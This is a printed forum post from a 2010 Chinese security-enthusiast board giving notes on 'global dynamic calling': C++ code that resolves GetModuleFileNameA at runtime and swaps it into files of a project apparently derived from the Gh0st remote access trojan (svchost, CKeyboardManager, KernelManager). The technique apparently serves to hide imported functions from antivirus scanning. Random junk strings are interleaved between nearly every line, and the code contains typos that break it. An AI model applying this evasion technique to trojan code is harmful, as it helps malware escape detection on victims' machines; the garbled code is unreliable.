标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
- i8 R5 n" u ^4 | e
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
, B5 m( E1 N( }6 Q! }/ @
----------------------------------------
; ^/ x/ S+ ` \
DTDY.h:
1 E* r% H( G0 v1 ?& K& V% B+ w
3 w* B& V; i7 c/ ^
#if _MSC_VER>1000
A$ Y5 U+ x; k) Y6 r- _
#pragma once
/ k" T# J- G$ S! z b- o
#endif //_MSC_VER>1000
* h0 z. v* f; F
#include<windows.h>
|; } j% n8 S$ I- r
0 d5 I F" M ~2 b, H8 T; j1 s
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
; _; @3 d# _+ ~( t/ E
class DTDY
9 M- I$ |0 Q8 M: J4 O
{
% c2 T$ p, M% R- `
public:
* ]( ^, K! P8 ?" M: `( t
DTDY();
6 W8 z) k# U# M. K) P
virtual ~DTDY();
3 z$ s3 f# b7 Y7 V* P! n! Y
public:
0 g- q8 X* y" u% m6 I" ?
static pGetModuleFileNameA MyGetModuleFileName;
& l1 G- E5 e& ]# h4 q) R: m
static BOOL FunInitiallization();
6 S9 P/ u; f2 I6 E! D% N( A5 q
};
& \, g( q) F( ^" J. f2 ^ o$ a$ t
#endif
* J% t: f/ z9 f m# V2 t
----------------------------------------
$ s6 c* X; p v- Z! {0 W' |
. a m7 c3 x8 w' O% F
DTDY.cpp:
! G& K& L7 z* s4 Z( y: ]( m
: @; b# e* r3 C4 Y: y; P0 P" L
#include "DTDY.h"
5 z; }/ M0 f, S
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
% j1 X& v8 L! x2 D) k6 I, [
DTDY:TDY()
/ t# Q8 ?% _$ i* D3 z
{
+ N5 T' s+ n8 t; z# q. T, }
}
: L# J4 S C( {; d4 E
DTDY::~DTDY()
2 e2 @& v0 Z0 ~+ U
{
1 |; K3 e1 A! ^+ z
}
# A7 V; e9 T- |) B
BOOL DTDY::FunInitiallization()
0 r1 ^$ i0 o( _. O% e0 ~$ c% F
{
4 p+ Q# d7 g- j2 U* ~
HMODULE hModule=LoadLibrary("kernel32.dll");
7 J9 s9 M' B' u/ ~2 d
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
* g7 P% U& F3 u2 U/ l- {
if(!MyGetModuleFileName=) return FALSE;
{2 B& n& q0 W" ]' d
8 D1 V- t+ \% l5 r: @( S" [
return TRUE;
2 `8 G6 G6 Y! y }$ p5 a: s# f2 ^
}
4 [6 }9 @! Q( E8 Z! g' [
----------------------------------------
1 i; t& w3 g _' x
svchost.cpp:
+ m: B5 H& d4 U: ^
; F$ h' J2 e ]$ Q# ~9 o2 U( S: J
#include "DTDY.h"
. R1 F/ T4 K4 a c
$ ~4 ^0 s) Q: L
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
( U; K/ X0 ^2 }& D2 M' Q$ F
{
# R, S* ~6 B, `% O Z
switch(ul_reason_for_call)
! ^2 X3 d8 r# n8 u! J3 n
{
$ Q3 B/ m( \! F. v# @
case DLL_PROCESS_ATTACH:
+ d) h% [1 `' i5 U4 ]; }8 a+ A# k u
if(!DTDY::FunInitiallization()) return FALSE;
, G3 V. ?, W* A1 v2 y
+ W& m2 B7 s/ X- ^) b b
break;
9 ?+ {9 ^+ q& e+ u1 Z# D8 }
}
- q( j3 ^+ e5 ^* @2 S7 P2 u
}
' N! X/ r$ Z% v- p* \2 ~
5 }4 a2 w7 c/ V9 O
2 D( {1 `; J0 C; Q7 H( J
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
; e8 \1 X) Y" ^/ ~
改写为
0 n, U9 O" @/ k9 @) m# V
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
+ h7 Q( B+ J, Z/ K1 a
----------------------------------------
4 @$ k% Q v- R5 r
KernelManager.cpp:
( ?1 T. T2 E% y; S
; ~# y! z& D* F8 V3 h. b
#include "../DTDY.h"
0 `1 }3 N+ V6 f) N; r
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
M1 Y _, v8 P q, ?0 R, [
改写为
1 }; j& R0 I) b% d! a
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
" i9 l L4 x% ^4 c$ H8 y2 ` n4 A
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
